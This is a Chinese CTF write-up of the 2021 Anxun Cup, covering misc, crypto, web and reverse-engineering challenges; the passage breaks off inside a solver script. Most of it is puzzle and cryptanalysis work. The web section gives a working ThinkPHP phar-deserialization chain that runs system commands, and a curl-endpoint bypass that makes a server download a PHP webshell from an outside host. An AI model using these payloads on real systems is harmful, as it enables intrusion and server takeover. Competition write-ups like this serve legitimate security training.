CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup

Misc 应该算是签到
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

B站搜索直接搜索这个BV号
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》
直接页面Ctrl+F没找出来
搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

F12点击Network,找到这个视频的cid
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

从当前时间2021-11-27开始往前找

https://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid=400438565&date=2021-11-27

将历史弹幕文件下载下来,选择UTF-8编码,然后查找关键字即可
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

D0g3{We1come_to_axbg0g0g0}

CyzCC_loves_LOL
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

D0g3_LOLteampassword
HAI D0g3 code I HAS A CODE ITZ "D0g3isthepAssword" I HAS A MSG ITZ "" I HAS A COUNTER ITZ 0 I HAS A NUM IM IN YR LOOP UPPIN YR COUNTER WILE COUNTER SMALLR THAN LEN OF CODE I HAS A C ITZ CODE!COUNTER NUM R ORD OF C NUM R SUM OF NUM AN -3 IZ NUM SMALLR THAN 65?, NUM R SUM OF NUM AN 26, KTHX NUM R CHR OF NUM MSG R SMOOSH MSG AN NUM IM OUTTA YR LOOP VISIBLE MSG KTHXBYE

看不懂什么东西,猜测某种编码,搜索引擎找一下
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

  • lolcode-language:https://www.dcode.fr/lolcode-language
解码得到ez_misc.zip密码:AGdJfpqebmXpptloa
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

Program.png根据名称提示一开始以为是npiet,尝试直接编译发现不对
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

后来经过查阅资料才发现Brainfuck也有一种用像素颜色表示的语言:Brainloller
  • https://minond.xyz/brainloller/
上传之后点击Play,得到密码:0MTTW CWZVN!
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

然后根据题目名称提示将密码中的空格换成下划线、以及jinx's_flag_in_silent.jpg的名称,直接尝试SilentEye解密
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

D0g3{544f3225-bbaf-47dc-ba8d-5bda54cbaecb}

Cthulhu Mythos
下载附件,发现是里面是一个hint.mp3The Evil Watcher.wld
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

hint.mp3听一下,发现前面是泰拉瑞亚的主题曲,后面部分很明显是SSTV
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

因为格式问题没法直接用QSSTVRX-SSTV的话又比较麻烦要调整电脑录音设备,就直接用Robot36听吧
网上随便找个地址:https://apkpure.com/cn/robot36-sstv-image-decoder/xdsopl.robot36
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

得到后半部分的flag:d_Try_Terr4ria!}
The Evil Watcher.wld文件是Terraria游戏的一个地图文件,我们可以通过Terramap地图查看器去加载这个地图文件
Terramap链接:https://www.bilibili.com/read/cv8778447/
等加载完地图,Players:选择All Spoiers,这样地图就全部显现出来了,可以通过左键拖动地图,右键可以查看相关物品信息
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

在地图中发现了四个蓝色突起状的东西,右键点击发现了类似base编码的东西
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

第四个箱子说密文被机械师拿走了
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

讲前三个箱子的base编码组合一下,得到base32编码
IQYGOM33JUYW4ZLDKI2GM5C

CyberChef解码一下得到前半部分的D0g3{M1necR4ft,但是跟后半部分是连不上的,我们再去看看第四个箱子里面被拿走的密文是什么
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

最后一个箱子的密文始终没有找到,在尝试了多个编辑器后,终于使用Tedit在出生地发现了最后的密文,不知道为啥有的编辑器不显示,有的编辑器又会显示。。。
Tedit下载地址:https://www.binaryconstruct.com/downloads/
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

得到7I4YF6QLO,所以完整的前半部分的base32编码就是IQYGOM33JUYW4ZLDKI2GM5C7I4YF6QLO
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

得到D0g3{M1necR4ft_G0_An,所以结合前面的后半部分flag:d_Try_Terr4ria!}
所以flag为:
D0g3{M1necR4ft_G0_And_Try_Terr4ria!}

lovemath
打开压缩包,里面除了flag.zip,还有几个 大小只有6的txt文件,这里应该是要crc32爆破了
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

使用命令:
python crc32.py reverse 0xCRC32的值

分别得到:
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

连起来就是:th1s_Is_Y0ur_pa33w0rd_We1c0m3e
打开flag.zip得到
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

用Stegsolve打开图片,发现R,G,B的0通道都有异常
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

应该是LSB隐写没跑了
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

我们将其Save Bin,保存为png图片,发现打不开,用010打开发现文件头前面有多余的字节,删掉后可打开得到一张带有很多数字的图片
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

因为没法复制,手撸的话估计眼睛要瞎了,尝试用QQ识图来获取数据,但是全部选中识别又有误差,于是选了个折中的办法就是半行半行的用QQ识图。。。总算是识别完了,遭不住,眼睛痛
1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352

尝试过转字符,但是失败了哈哈哈哈,果然作为500分的题肯定没这么简单,根据题目,lovemath数学如此美丽,甚至能画出自己来看,这题应该是要通过某种数学方式来绘图,并且注意这句甚至能画出自己,最后百度了很久,终于在百度自我画图公式的结果中,发现了塔伯自我指涉公式作图程序(matplotlib),里面还附有脚本
脚本地址:https://www.cnblogs.com/1024th/p/14418846.html
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

脚本如下:
""" Plot Tupper's self-referential formula """ import textwrap import matplotlib.pyplot as pltK = 1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352H = 17 W = 106if __name__ == "__main__": plt.figure(figsize=(6.8, 4), dpi=600) plt.axis("scaled")K_ = K//17 for x in range(W): for y in range(H): if K_ & 1: plt.bar(x+0.5, bottom=y, height=1, width=1, linewidth=0, color="black") K_ >>= 1plt.figtext(0.5, 0.8, r"$\frac{1}{2}<\left\lfloor \operatorname{mod}\left(\left\lfloor\frac{y}{%d}\right\rfloor 2^{-%d\lfloor x\rfloor-\operatorname{mod}(\lfloor y\rfloor, %d)}, 2\right)\right\rfloor$" % (H, H, H), ha="center", va="bottom", fontsize=18) plt.subplots_adjust(top=0.8, bottom=0.5) K_str = textwrap.wrap(str(K), 68) K_str[0] = f"K={K_str[0]}" for i in range(1, len(K_str)): K_str[i] = f"{K_str[i]}".ljust(70) K_str = "\n".join(K_str) plt.figtext(0.5, 0.45, K_str, fontfamily="monospace", ha="center", va="top")plt.xlim((0, W)) plt.ylim((0, H)) xticks = list(range(0, W+1)) xlabels = ["" for i in xticks] xlabels[0] = "0" xlabels[-1] = str(W) plt.xticks(xticks, xlabels) yticks = list(range(0, H+1)) ylabels = ["" for i in yticks] ylabels[0] = "K" ylabels[-1] = f"K+{H}" plt.yticks(yticks, ylabels) plt.grid(b=True, linewidth=0.5)# plt.show() plt.savefig("Tupper-plot.png") # plt.savefig(fname="name", format="svg")

把之前得到的数据填入K之后运行,得到Tupper-plot.png
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

得到flag为:
D0g3{I_Lov3_math}

Cry little_trick
注意到e的生成:
e = g m p y 2. n e x t ? p r i m e ( b y t e s ? t o ? l o n g ( o s . u r a n d o m ( 3 ) ) ) e = gmpy2.next-prime(bytes-to-long(os.urandom(3))) e=gmpy2.next?prime(bytes?to?long(os.urandom(3)))
由此可知e的取值较小,可以爆破出来,大致估计e的范围:e<256 * 256 * 150+256 * 150 +150=9868950,于是设置e的上界为e<10000000.
直接爆破e时间可能太久,我们采取空间换时间的方法:先把这个范围内的素数全求出来,存在一个列表里面,然后对列表索引爆破,判断依据为b’D0g3’。
exp
import sympy from gmpy2 import * from Crypto.Util.number import * p=119494148343917708105807117614773529196380452025859574123211538859983094108015678321724495609785332508563534950957367289723559468197440246960403054020452985281797756117166991826626612422135797192886041925043855329391156291955066822268279533978514896151007690729926904044407542983781817530576308669792533266431 q=125132685086281666800573404868585424815247082213724647473226016452471461555742194042617318063670311290694310562746442372293133509175379170933514423842462487594186286854028887049828613566072663640036114898823281310177406827049478153958964127866484011400391821374773362883518683538899757137598483532099590137741 c=10238271315477488225331712641083290024488811710093033734535910573493409567056934528110845049143193836706122210303055466145819256893293429223389828252657426030118534127684265261192503406287408932832340938343447997791634435068366383965928991637536875223511277583685579314781547648602666391656306703321971680803977982711407979248979910513665732355859523500729534069909408292024381225192240385351325999798206366949106362537376452662264512012770586451783712626665065161704126536742755054830427864982782030834837388544811172279496657776884209756069056812750476669508640817369423238496930357725842768918791347095504283368032 e=2 phi=(p-1)*(q-1) n=p*q l=[2] while e<10000000: e=sympy.nextprime(e) l.append(e) for e in l: if gcd(e,phi)!=1: continue d=invert(e,phi) m=long_to_bytes(pow(c,d,n)) if b'D0g3' in m: print(m) break

运行大概十几二十分钟可得结果。
flag为:
D0g3{Welc0me_t0_iSOON_4nd_have_4_go0d_time}

ez_equation
设primelist中的三个素数分别为p1,p2,p3,则有M1=y1+x2+x3= p 2 ( p 1 + 1 ) ( p 1 + p 2 ) p_2(p_1+1)(p_1+p_2) p2?(p1?+1)(p1?+p2?),M2=y2+y3= p 2 ( p 3 + 1 ) ( p 1 + p 2 ) ? 2 p_2(p_3+1)(p_1+p_2)-2 p2?(p3?+1)(p1?+p2?)?2,于是M3=M2+2= p 2 ( p 3 + 1 ) ( p 1 + p 2 ) p_2(p_3+1)(p_1+p_2) p2?(p3?+1)(p1?+p2?),对M1和M3求gcd可得 p 2 ? ( p 1 + p 2 ) ? g c d ( p 1 + 1 , p 3 + 1 ) p_2*(p_1+p_2)*gcd(p_1+1,p_3+1) p2??(p1?+p2?)?gcd(p1?+1,p3?+1),我们在1000的范围内爆破 g c d ( p 1 + 1 , p 3 + 1 ) gcd(p_1+1,p_3+1) gcd(p1?+1,p3?+1),即可求得p1,p2,p3,后面由于p,q很近,枚举p-q分解n,正常解密即可。
exp
import sympy from gmpy2 import * from Crypto.Util.number import * def solve(a,b,c): delta=b*b-4*a*c if delta<0: return (0,0) delta=isqrt(delta) if (-b+delta)%(2*a)!=0 or (-b-delta)%(2*a)!=0: return (0,0) return ((-b+delta)//(2*a),(-b-delta)//(2*a))M1=3826382835023788442651551584905620963555468828948525089808250303867245240492543151274589993810948153358311949129889992078565218014437985797623260774173862776314394305207460929010448541919151371739763413408901958357439883687812941802749556269540959238015960789123081724913563415951118911225765239358145144847672813272304000303248185912184454183649550881987218183213383170287341491817813853157303415010621029153827654424674781799037821018845093480149146846916972070471616774326658992874624717335369963316741346596692937873980736392272357429717437248731018333011776098084532729315221881922688633390593220647682367272566275381196597702434911557385351389179790132595840157110385379375472525985874178185477024824406364732573663044243615168471526446290952781887679180315888377262181547383953231277148364854782145192348432075591465309521454441382119502677245090726728912738123512316475762664749771002090738886940569852252159994522316M2=4046011043117694641224946060698160981194371746049558443191995592417947642909277226440465640195903524402898673255622570650810338780358645872293473212692240675287998097280715739093285167811740252792986119669348108850168574423371861266994630851360381835920384979279568937740516573412510564312439718402689547377548575653450519989914218115265842158616123026997554651983837361028152010675551489190669776458201696937427188572741833635865019931327548900804323792893273443467251902886636756173665823644958563664967475910962085867559357008073496875191391847757991101189003154422578662820049387899402383235828011830444034463049749668906583814229827321704450021715601349950406035896249429068630164092309047645766216852109121662629835574752784717997655595307873219503797996696389945782836994848995124776375146245061787647756704605043856735398002012276311781956668212776588970619658063515356931386886871554860891089498456646036630114620806#t=gcd(M1,M2+2),m1=M1//t,m2=(M2+2)//tt=195589523630445818529902860956832796890855251392633128505267360019379766078441039447714629517705654989596005641784168486211312686680455807626431626165080866039191378864985968731741426496463223663496416166582452161079104234385985738660388414139911168334469051423205629829765572078313431736483728155228814915764228990643229252394940446647628166159386129345355060753013764486772721947063419319730756920046220488674399534007795610790140941688361870003545561101950379051252306239620980393842817770270164660348572241648029661122045865707023959462688020516797465334280134572790507613563583907925334439091301297527252508403124 m1=19563332248068151535630981329078704836011877594400641639369459141215900260861025312054906757599794566083208720855569882795966368648050841796097774666530924861861072322505359934227960441733030841677273935286749895660385076617500078541482883261409708629757597729348593181573750624736984373186183627343721574559 m2=20686235990647329610791853921718735187994958766092474204131359561885208246097905843101029093347765900355157072072179547621235081101156100572779845352580259426625670629461859798011004868747162865241652060762059495558269934939075323522904748472063800026320062177474213759817229716245635847559587261121068310442 for i in range(2,1000,2): t1=i*m1-1 t2=i*m2-1 if sympy.isprime(t1): break#gcd=6,t1=117379993488408909213785887974472229016071265566403849836216754847295401565166151872329440545598767396499252325133419296775798211888305050776586647999185549171166433935032159605367762650398185050063643611720499373962310459705000471248897299568458251778545586376091559089442503748421906239117101764062329447353,t2=124117415943883977664751123530312411127969752596554845224788157371311249476587435058606174560086595402130942432433077285727410486606936603436679072115481556559754023776771158788066029212482977191449912364572356973349619609634451941137428490832382800157920373064845282558903378297473815085357523566726409862651 c=1394946766416873131554934453357121730676319808212515786127918041980606746238793432614766163520054818740952818682474896886923871330780883504028665380422608364542618561981233050210507202948882989763960702612116316321009210541932155301216511791505114282546592978453573529725958321827768703566503841883490535620591951871638499011781864202874525798224508022092610499899166738864346749753379399602574550324310119667774229645827773608873832795828636770263111832990012205276425559363977526114225540962861740929659841165039419904164961095126757294762709194552018890937638480126740196955840656602020193044969685334441405413154601311657668298101837066325231888411018908300828382192203062405287670490877283269761047853117971492197659115995537837080400730294215778540754482680476723953659085854297184575548489544772248049479632420289954409052781880871933713121875562554234841599323223793407272634167421053493995795570508435905280269774274084603687516219837730100396191746101622725880529896250904142333391598426588238082485305372659584052445556638990497626342509620305749829144158797491411816819447836265318302080212452925144191536031249404138978886262136129250971366841779218675482632242265233134997115987510292911606736878578493796260507458773824689843424248233282828057027197528977864826149756573867022173521177021297886987799897923182290515542397534652789013340264587028424629766689059507844211910072808286250914059983957934670979551428204569782238857331272372035625901349763799005621577332502957693517473861726359829588419409120076625939502382579605 n=19445950132976386911852381666731799463510958712950274248183192405937223343228119407660772413067599252710235310402278345391806863116119010697766434743302798644091220730819441599784039955347398797545219314925103529062092963912855489464914723588833817280786158985269401131919618320866942737291915603551320163001129725430205164159721810319128999027215168063922977994735609079166656264150778896809813972275824980250733628895449444386265971986881443278517689428198251426557591256226431727934365277683559038777220498839443423272238231659356498088824520980466482528835994554892785108805290209163646408594682458644235664198690503128767557430026565606308422630014285982847395405342842694189025641950775231191537369161140012412147734635114986068452144499789367187760595537610501700993916441274609074477086105160306134590864545056872161818418667370690945602050639825453927168529154141097668382830717867158189131567590506561475774252148991615602388725559184925467487450078068863876285937273896246520621965096127440332607637290032226601266371916124456122172418136550577512664185685633131801385265781677598863031205194151992390159339130895897510277714768645984660240750580001372772665297920679701044966607241859495087319998825474727920273063120701389749480852403561022063673222963354420556267045325208933815212625081478538158049144348626000996650436898760300563194390820694376019146835381357141426987786643471325943646758131021529659151319632425988111406974492951170237774415667909612730440407365124264956213064305556185423432341935847320496716090528514947 e=65537 p1=t1 p3=t2 term=t//6 p2,P2=solve(1,p1,-term) pq=n//(p1*p2*p3) k=2 while 1: cha=k he=(pq+cha*cha//4)*4 if iroot(he,2)[1]==True: he=iroot(he,2)[0] break k+=2 p,q=solve(1,-he,pq) phi=(p-1)*(q-1)*(p1-1)*(p2-1)*(p3-1) d=invert(e,phi) m=long_to_bytes(pow(c,d,n)) print(m[256:256+42])

flag:为
D0g3{296b680c-7aeb-5272-8b33-7335b411fbcb}

strange
注意到m是flag,相对于hint和n来说都比较小,m|hint的操作对于hint来说影响很小,这就存在一个小值根,因此采用coppersmith的方法先解出m1,然后根据m1和m2先预估出m的位数,再爆破m的每一位来得到flag。
exp:
##sagemath n=13002904520196087913175026378157676218772224961198751789793139372975952998874109513709715017379230449514880674554473551508221946249854541352973100832075633211148140972925579736088058214014993082226530875284219933922497736077346225464349174819075866774069797318066487496627589111652333814065053663974480486379799102403118744672956634588445292675676671957278976483815342400168310432107890845293789670795394151784569722676109573685451673961309951157399183944789163591809561790491021872748674809148737825709985578568373545210653290368264452963080533949168735319775945818152681754882108865201849467932032981615400210529003 c=8560367979088389639093355670052955344968008917787780010833158290316540154791612927595480968370338549837249823871244436946889198677945456273317343886485741297260557172704718731809632734567349815338988169177983222118718585249696953103962537942023413748690596354436063345873831550109098151014332237310265412976776977183110431262893144552042116871747127301026195142320678244525719655551498368460837394436842924713450715998795899172774573341189660227254331656916960984157772527015479797004423165812493802730996272276613362505737536007284308929288293814697988968407777480072409184261544708820877153825470988634588666018802 h=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144 Zmod=Zmod(n) P.=PolynomialRing(Zmod) f=(h+x)^3-c x0=f.small_roots(X=2^400,beta=0.5) print(x0) m1=x0+h print(m1) ##python from Crypto.Util.number import * h=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144 m1=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210933049560781360717427446713646109570038056138652803756149233612618692820860571507613112565167824369560313209417725 m2=9869907877594701353175281930839281485694004896356038595955883788511764488228640164047958227861871572990960024485992 m='' m1=bin(m1)[2:] m1=m1[::-1] h=bin(h)[2:] h=h[::-1] m2=bin(m2)[2:] m2=m2[::-1] m2+='00000' bit=[0,1] for i in range(383): for j in bit: if j|int(h[i])==int(m1[i]) and j&int(h[i])==int(m2[i]): m+=str(j) print(m[::-1]) print(int(m[::-1],2)) print(long_to_bytes(int(m[::-1],2)))

flag为:
D0g3{R54_f4l1_1n_l0ve_with_CopperSmith_w0wow0!!}

Web ez_tp
扫到www.zip,下载到源码。版本5.1.37,diff了一下发现没有什么不同,直接看源码
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

能读任意文件,但找不到flag位置,不过很明显看出phar反序列化
找链子生成phar文件
files[]=new Pivot(); } } } namespace think{ abstract class Model { protected $append = []; private $data = https://www.it610.com/article/[]; public function __construct(){ $this->data=https://www.it610.com/article/array('feng'=>new Request() ); $this->append=array( 'feng'=>array( 'hello'=>'world' ) ); } } } namespace think\model{use think\Model; class Pivot extends Model {} } namespace think{ class Request { protected $hook = []; protected $filter; protected $config = [ // 表单请求类型伪装变量 'var_method'=> '_method', // 表单ajax伪装变量 'var_ajax'=> '', // 表单pjax伪装变量 'var_pjax'=> '_pjax', // PATHINFO变量名 用于兼容模式 'var_pathinfo'=> 's', // 兼容PATH_INFO获取 'pathinfo_fetch'=> ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'], // 默认全局过滤方法 用逗号分隔多个 'default_filter'=> '', // 域名根,如thinkphp.cn 'url_domain_root'=> '', // HTTPS代理标识 'https_agent_name' => '', // IP代理获取标识 'http_agent_ip'=> 'HTTP_X_REAL_IP', // URL伪静态后缀 'url_html_suffix'=> 'html', ]; public function __construct(){ $this->hook['visible']=[$this,'isAjax']; $this->filter="system"; } } } namespace{ use think\process\pipes\Windows; $phar = new Phar("phar3.phar"); //后缀名必须为phar,压缩后的文件名 $phar->startBuffering(); $phar->setStub(" __HALT_COMPILER(); ?>"); //设置stub $o = new Windows(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("hello.txt", "test"); //test为内容test.txt为要压缩的文件(可以不存在) //签名自动计算 $phar->stopBuffering(); //echo base64_encode(serialize(new Windows)); }

读phar

payload变量覆盖一下
http://1.12.220.15:19274/index.php/index/index/hello?shell=cat /*
world=hello=IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KJgMAAAEAAAARAAAAAQAAAAAA7wIAAE86Mjc6InRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cyI6MTp7czozNDoiAHRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cwBmaWxlcyI7YToxOntpOjA7TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjI6e3M6OToiACoAYXBwZW5kIjthOjE6e3M6NDoiZmVuZyI7YToxOntzOjU6ImhlbGxvIjtzOjU6IndvcmxkIjt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NDoiZmVuZyI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo4O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjEwOntzOjEwOiJ2YXJfbWV0aG9kIjtzOjc6Il9tZXRob2QiO3M6ODoidmFyX2FqYXgiO3M6MDoiIjtzOjg6InZhcl9wamF4IjtzOjU6Il9wamF4IjtzOjEyOiJ2YXJfcGF0aGluZm8iO3M6MToicyI7czoxNDoicGF0aGluZm9fZmV0Y2giO2E6Mzp7aTowO3M6MTQ6Ik9SSUdfUEFUSF9JTkZPIjtpOjE7czoxODoiUkVESVJFQ1RfUEFUSF9JTkZPIjtpOjI7czoxMjoiUkVESVJFQ1RfVVJMIjt9czoxNDoiZGVmYXVsdF9maWx0ZXIiO3M6MDoiIjtzOjE1OiJ1cmxfZG9tYWluX3Jvb3QiO3M6MDoiIjtzOjE2OiJodHRwc19hZ2VudF9uYW1lIjtzOjA6IiI7czoxMzoiaHR0cF9hZ2VudF9pcCI7czoxNDoiSFRUUF9YX1JFQUxfSVAiO3M6MTU6InVybF9odG1sX3N1ZmZpeCI7czo0OiJodG1sIjt9fX19fX0JAAAAaGVsbG8udHh0BAAAAAJnomEEAAAADH5/2LYBAAAAAAAAdGVzdM/lB06QxBmPdCdWlMiCHMEIvsfXAgAAAEdCTUI=%26a=phar://hello.txt

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

ezcms
审到很多前台sql注入,只能时间盲注,总是注到一半环境就崩,崩了之后重开又打不通了。
之后本地测试之后是可以未授权的,所以直接找后台功能,看到一个curl接口。
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

应该是可以远程下载文件的。
前面有
if (isset($_GET['url'])){ $dname=explode("/", $_GET['url']); // print_r($dname); if(strpos($dname[2],'sem-cms.cn') !== false){ $url=$_GET['url']; }else{ echo(""); exit; }

用/分隔,dname[2]得包含sem-cms.cn,设置php文件名为此即可。
payload
http://81.69.27.32:8888/CxWsbN_AR4/Ant_Curl.php?url=47.101.176.40/shell/sem-cms.cn.php

提示下载失败,但本地测试之后其实是成功的,蚁剑连接
Soft/Zip/sem-cms.cn.php
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

RE virtus
是傀儡进程,先dump出来真正的程序
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

题目要求输入两个内容,一个是key,一个是flag,key的长度是4,flag长度是32
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

使用线程对flag进行加密,算法很简单,就是异或
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

这里是对key进行运算,再用运算后的结果进行比较
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

Key的加密算法我没看懂,但是Key长度并不长,直接写个脚本爆破,爆破出来key是:_shy
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

剩下的部分就是根据key生成密钥表,然后对flag进行加密,最后进行比较
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

加密算法如下,推出:v3[i ] = sub_401005(*(a2 + 4 * i + 16) ^ v3[i + 3] ^ v3[i + 2] ^ v3[i + 1]) ^ v3[i+4]
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

剩下的就是把4011E0的加密算法抄下来,然后套上面推出来的公式,就能跑出flag
脚本如下:
#include "stdafx.h" int key[]={ 0xcbd6c588, 0x03f17d27, 0x1c18e9cc, 0xfe024db3, 0xd71737eb, 0x7b9b1eab, 0x2776bba4, 0xbd2018c0, 0x356d0553, 0x0c825513, 0xcaaff094, 0x9dfbcba1, 0x7eb6b878, 0x47630f35, 0x4b494bbe, 0x34fd620a, 0x14cf85ef, 0xd754e93a, 0x338b4918, 0xc0846091, 0xd526f236, 0xb9ce1fc7, 0xcb537b6a, 0x25fdd8ea, 0x7221094b, 0xa1f73abf, 0x2473d8cc, 0x8fa4f2f2, 0x1e7cac59, 0xec581806, 0x425d33c3, 0xbeb16ed4, 0xe5c0ca70, 0x02b60624, 0x3011744f, 0xf73a6e51, 0x4e7f6768, 0x774e5b55, 0x5b78657b, 0x6f6f724c, 0xcccccc00, 0x7968735f, 0xcccccc00, 0x0018ff88, 0x00402579, 0x00000001, 0x008e1228, 0x008e1290}; char map[352]={ 0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05, 0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99, 0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62, 0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6, 0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8, 0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35, 0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87, 0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e, 0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1, 0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3, 0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f, 0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51, 0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 